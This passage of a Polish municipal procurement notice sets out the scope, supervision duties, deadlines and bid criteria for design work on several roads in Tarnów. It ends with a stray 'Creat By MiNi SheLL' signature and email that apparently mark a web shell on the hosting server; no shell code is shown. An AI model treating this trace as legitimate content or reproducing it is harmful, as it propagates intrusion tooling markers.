m)	Aktualizację - w razie potrzeby, kosztorysów inwestorskich w okresie 2 lat od daty ich wykonania.
n)	Wykonanie projektów docelowej organizacji ruchu odrębnie dla każdego etapu.
o)	Wykonanie projektów czasowej organizacji ruchu (na czas wykonywanych robót) odrębnie dla każdego etapu.
5)	Ponadto Wykonawca dokumentacji projektowej zobowiązuje się do:
a)	Pełnienia nadzoru autorskiego przez projektantów w zakresie zgodnym z art. 20 ustawy 
z dnia 07.07.1994 r. Prawo budowlane (t.j. Dz. U. z 2016 r., poz. 666), w tym:
- stwierdzania w toku wykonywania robót budowlanych zgodności realizacji 
z projektem;
- stawiania się na budowie w terminie nie dłuższym niż 3 dni od daty wezwania 
w razie konieczności, średnio jeden raz w miesiącu w trakcie realizacji zadania;
- udzielania odpowiedzi i wyjaśnień dotyczących prac objętych dokumentacją projektową, w terminie nie dłuższym niż 3 dni od daty powzięcia informacji o zaistniałym problemie;
- uzgadniania możliwości wprowadzenia rozwiązań zamiennych w stosunku 
do przewidzianych w projekcie, zgłoszonych  przez kierownika budowy lub inspektora nadzoru inwestorskiego;
- opracowywania rozwiązań alternatywnych, rozumianych jako konieczne, 
a niemożliwe do przewidzenia na etapie opracowywania projektu w terminie wyznaczonym przez Zamawiającego.
b)	Uzupełniania braków oraz usuwania wad w trakcie trwania postępowania wszczętego na podstawie zgłoszenia robót budowlanych.
c)	Udzielenia odpowiedzi, jeżeli w trakcie prowadzonego przez Zamawiającego postępowania przetargowego na wyłonienie wykonawcy robót budowlanych (wykonawstwo) wpłyną pytania dotyczące prac projektowych objętych niniejszym postępowaniem, w terminie nie dłuższym niż 2 dni od daty uzyskania treści pytania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 96</li>
<li>2. Rozszerzenie okresu rękojmi za wady przedmiotu zamówienia - 4</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie dokumentacji technicznej drogi dojazdowej do obiektów TOSiR przy ul. Wojska Polskiego - ZRID.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zakres zamówienia obejmuje między innymi:
1)	Wykonanie mapy sytuacyjno-wysokościowej do celów projektowych w skali 1:500.
2)	Wykonanie badań geologicznych w zakresie niezbędnym do prawidłowego opracowania dokumentacji.
3)	Opracowanie projektów: budowlanego i wykonawczego na niżej wskazany zakres:
a)	przebudowa drogi dojazdowej od ul.Gen. Władysława Langnera z odcięciem dotychczasowego zjazdu przy ul. Wojska Polskiego z przesunięciem wlotu ulicy Gen. Władysława Langnera na wprost wlotu ul. Bitwy o Wał Pomorski;
b)	budowę odwodnienia ulicznego na bazie warunków uzyskanych od Zarządców obecnie istniejących sieci;
c)	budowę oświetlenia ulicznego oraz przebudowę istniejącego;
d)	zabezpieczenie lub przełożenie istniejącego uzbrojenia podziemnego i naziemnego, wynikające z uzyskanych warunków technicznych od ich użytkowników;
e)	wykonanie kanału technologicznego.
4)	Opracowanie projektów  branżowych:
a)	projekt branży drogowej;
b)	projekt branży elektrycznej i teletechnicznej ;
c)	projekty branżowe niezbędnych przekładek lub zabezpieczenia istniejącego uzbrojenia podziemnego i naziemnego.
5)	Wykonanie analizy  stanu własności gruntów oraz   projektu  podziału działek.
6)	Wykonanie przedmiarów robót.
7)	Wykonanie kosztorysów inwestorskich.
8)	Wykonanie projektu docelowej organizacji ruchu.
9)	Wykonanie inwentaryzacji zieleni.
10)	Wykonanie Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych.
11)	Przygotowanie dokumentacji prawnej oraz wniosku do uzyskania decyzji o zezwoleniu na realizację inwestycji drogowej w tym m.in.: uzyskanie zgody wszystkich właścicieli nieruchomości, na których lokalizowane będą urządzenia uzbrojenia podziemnego poza liniami rozgraniczającymi pas drogowy, sporządzenie projektu podziału wszystkich nieruchomości wraz z gminnymi w zakresie linii rozgraniczających pasa drogowego.
12)	Uzyskanie decyzji pozwolenia wodno-prawnego oraz innych wymaganych przepisami zgód, uzgodnień, opinii i decyzji.
13)	Aktualizację - w razie potrzeby, kosztorysów inwestorskich w okresie 2 lat od daty ich wykonania.

2.    Ponadto wykonawca dokumentacji projektowej zobowiązuje się do:
1)	Pełnienia nadzoru autorskiego przez projektantów w zakresie zgodnym z art. 20 ustawy 
z dnia 07.07.1994 r. Prawo budowlane (t.j. Dz. U. z 2016 r., poz. 290), w tym:
a)	stwierdzania w toku wykonywania robót budowlanych zgodności realizacji 
z projektem;
b)	stawiania się na budowie w terminie nie dłuższym niż 3 dni od daty wezwania 
w razie konieczności, średnio jeden raz w miesiącu w trakcie realizacji zadania;
c)	udzielania odpowiedzi i wyjaśnień dotyczących prac objętych dokumentacją projektową, w terminie nie dłuższym niż 3 dni od daty powzięcia informacji o zaistniałym problemie;
d)	uzgadniania możliwości wprowadzenia rozwiązań zamiennych w stosunku 
do przewidzianych w projekcie, zgłoszonych  przez kierownika budowy lub inspektora nadzoru inwestorskiego;
e)	opracowywania rozwiązań alternatywnych, rozumianych jako konieczne, 
a niemożliwe do przewidzenia na etapie opracowywania projektu w terminie wyznaczonym przez zamawiającego.
2)	Uzupełniania braków oraz usuwania wad w trakcie trwania postępowania wszczętego na podstawie wniosku o wydanie decyzji o zezwoleniu na realizację inwestycji drogowej oraz ewentualnego postępowania odwoławczego  związanego z wydaniem w/w decyzji.
3)	Udzielenia odpowiedzi, jeżeli w trakcie prowadzonego przez zamawiającego postępowania przetargowego na wyłonienie wykonawcy robót budowlanych (wykonawstwo) wpłyną pytania dotyczące prac projektowych objętych niniejszym postępowaniem, w terminie nie dłuższym niż 2 dni od daty uzyskania treści pytania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 96</li>
<li>2. Rozszerzenie okresu rękojmi za wady przedmiotu zamówienia - 4</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opracowanie dokumentacji na kompleksowy remont ul. Rzędzińskiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zakres zamówienia obejmuje między innymi:
1)	Wykonanie mapy sytuacyjno-wysokościowej do celów projektowych w skali 1:500.
2)	Wykonanie badań geologicznych w zakresie niezbędnym do prawidłowego opracowania dokumentacji.
3)	Opracowanie projektów: budowlanego na niżej wskazany zakres:
a)	przebudowę  ul. Rzędzińskiej od ul. Skrzyszowskiej  jako ciągu pieszo-jezdnego wraz z odwodnieniem;
b)	budowę oświetlenia ulicznego na odcinku od dz. 31/14  do dz. 25/8;
c)	zabezpieczenie lub przełożenie istniejącego uzbrojenia podziemnego i naziemnego, wynikające z uzyskanych warunków technicznych od ich użytkowników;
d)	wykonanie kanału technologicznego w oparciu o rury osłonowe o przekroju min O110 i O 60 prowadzonych wzdłuż kabli oświetleniowych.
4)	Wykonanie przedmiarów robot.
5)	Wykonanie kosztorysów inwestorskich.
6)	Powyższe elementy należy opracować w rozbiciu na branże:
a)	projekt branży drogowej;
b)	projekt branży elektrycznej i teletechnicznej;
c)	projekty branżowe niezbędnych przekładek lub zabezpieczenia istniejącego uzbrojenia podziemnego i naziemnego.

7)	Wykonanie projektu docelowej organizacji ruchu.
8)	Wykonanie inwentaryzacji zieleni.
9)	Wykonanie operatu wodno-prawnego na odprowadzenie wód.
10)	Wykonanie Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych.
11)	Przygotowanie dokumentacji prawnej oraz wniosku do uzyskania decyzji pozwolenia na budowę lub zgłoszenia w tym m.in.: uzyskanie zgody wszystkich właścicieli nieruchomości, na których lokalizowane będą urządzenia uzbrojenia podziemnego, sporządzenie projektu podziału wszystkich nieruchomości wraz z gminnymi w zakresie linii rozgraniczający pas drogowy.
12)	Uzyskanie decyzji pozwolenia wodno-prawnego oraz innych wymaganych przepisami  zgód, opinii, uzgodnień innych decyzji koniecznych do złożenia przez Zamawiającego wniosku pozwolenia na budowę.
13)	Aktualizację - w razie potrzeby, kosztorysów inwestorskich w okresie 2 lat od daty ich wykonania.

2.    Ponadto wykonawca dokumentacji projektowej zobowiązuje się do:
1)	Pełnienia nadzoru autorskiego przez projektantów w zakresie zgodnym z art. 20 ustawy 
z dnia 07.07.1994 r. Prawo budowlane (t.j. Dz. U. z 2016 r., poz. 290), w tym:
a)	stwierdzania w toku wykonywania robót budowlanych zgodności realizacji 
z projektem;
b)	stawiania się na budowie w terminie nie dłuższym niż 3 dni od daty wezwania 
w razie konieczności, średnio jeden raz w miesiącu w trakcie realizacji zadania;
c)	udzielania odpowiedzi i wyjaśnień dotyczących prac objętych dokumentacją projektową, w terminie nie dłuższym niż 3 dni od daty powzięcia informacji o zaistniałym problemie;
d)	uzgadniania możliwości wprowadzenia rozwiązań zamiennych w stosunku 
do przewidzianych w projekcie, zgłoszonych  przez kierownika budowy lub inspektora nadzoru inwestorskiego;
e)	opracowywania rozwiązań alternatywnych, rozumianych jako konieczne, 
a niemożliwe do przewidzenia na etapie opracowywania projektu w terminie uzgodnionym  przez zamawiającego.
2)	Uzupełniania braków oraz usuwania wad w trakcie trwania postępowania wszczętego na podstawie zgłoszenia robót budowlanych oraz ewentualnego postępowania odwoławczego  związanego z wydaniem w/w decyzji.
3)	Udzielenia odpowiedzi, jeżeli w trakcie prowadzonego przez Zamawiającego postępowania przetargowego na wyłonienie wykonawcy robót budowlanych (wykonawstwo) wpłyną pytania dotyczące prac projektowych objętych niniejszym postępowaniem, w terminie nie dłuższym niż 2 dni od daty uzyskania treści pytania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 96</li>
<li>2. Rozszerzenie okresu rękojmi za wady przedmiotu zamówienia - 4</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykonanie dokumentacji projektowej przebudowy ul. Barwnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zakres zamówienia obejmuje między innymi:
1)	Pozyskanie mapy do celów projektowych w skali 1:500.
2)	Wykonanie badań geologicznych w zakresie niezbędnym do prawidłowego opracowania dokumentacji.
3)	Wykonanie projektu budowlanego i wykonawczego dla poniżej wskazanego zakresu:
a)	remont ul. Barwnej - wykonanie nawierzchni bitumicznej wraz z wymianą podbudowy;
b)	budowa odwodnienia ulicznego;
c)	wykonanie kanału technologicznego w oparciu o rurę osłonową o przekroju 
min. O 110 i O 60 mm;
d)	zabezpieczenie lub przełożenie istniejącego uzbrojenia podziemnego i naziemnego, wynikające z uzyskanych warunków technicznych od ich użytkowników.
4)	Wykonanie operatu wodno-prawnego.
5)	Wykonanie przedmiarów robót.
6)	Wykonanie kosztorysu inwestorskiego.
7)	Wykonanie projektu docelowej organizacji ruchu.
8)	Wykonanie projektu czasowej organizacji ruchu (na czas wykonywanych robót).
9)	Wykonanie Specyfikacji Technicznych Wykonania i Odbioru Robót Budowlanych.
10)	Sporządzenie projektu wniosku o wydanie decyzji pozwolenia na budowę do właściwego organu architektury.
11)	Uzyskanie decyzji pozwolenia wodno-prawnego oraz innych wymaganych uzgodnień, decyzji i pozwoleń, o ile są wymagane przepisami prawa.
12)	Uzgodnienie niezbędnych branż w Zarządzie Dróg i Komunikacji w Tarnowie oraz 
ew. u gestorów właściwych sieci. Wykonawcy zostanie udzielone pełnomocnictwo do występowania w imieniu Zamawiającego.
13)	Aktualizację - w razie potrzeby, kosztorysu inwestorskiego w zakresie cen w okresie 2 lat od daty jego wykonania.

2.	Ponadto wykonawca dokumentacji projektowej zobowiązuje się do:
1)	pełnienia nadzoru autorskiego przez projektantów w zakresie zgodnym z art. 20 ustawy 
z dnia 07.07.1994 r. Prawo budowlane (t.j. Dz. U. z 2016 r., poz. 290), w tym:
a)	stwierdzania w toku wykonywania robót budowlanych zgodności realizacji 
z projektem;
b)	stawiania się na budowie w terminie nie dłuższym niż 3 dni od daty wezwania 
w razie konieczności, średnio jeden raz w miesiącu w trakcie realizacji zadania;
c)	udzielania odpowiedzi i wyjaśnień dotyczących prac objętych dokumentacją projektową, w terminie nie dłuższym niż 3 dni od daty powzięcia informacji o zaistniałym problemie;
d)	uzgadniania możliwości wprowadzenia rozwiązań zamiennych w stosunku 
do przewidzianych w projekcie, zgłoszonych  przez kierownika budowy lub inspektora nadzoru inwestorskiego;
e)	opracowywania rozwiązań alternatywnych, rozumianych jako konieczne, a niemożliwe do przewidzenia na etapie opracowywania projektu w terminie wyznaczonym przez zamawiającego.
2)	Uzupełniania braków oraz usuwania wad w trakcie trwania postępowania wszczętego na podstawie wniosku o wydanie decyzji pozwolenia na budowę oraz ewentualnego postępowania odwoławczego  związanego z wydaniem w/w decyzji.
3)	Udzielenia odpowiedzi, jeżeli w trakcie prowadzonego przez zamawiającego postępowania przetargowego na wyłonienie wykonawcy robót budowlanych (wykonawstwo) wpłyną pytania dotyczące prac projektowych objętych niniejszym postępowaniem, w terminie nie dłuższym niż 2 dni od daty uzyskania treści pytania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 96</li>
<li>2. Rozszerzenie okresu rękojmi za wady przedmiotu zamówienia - 4</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com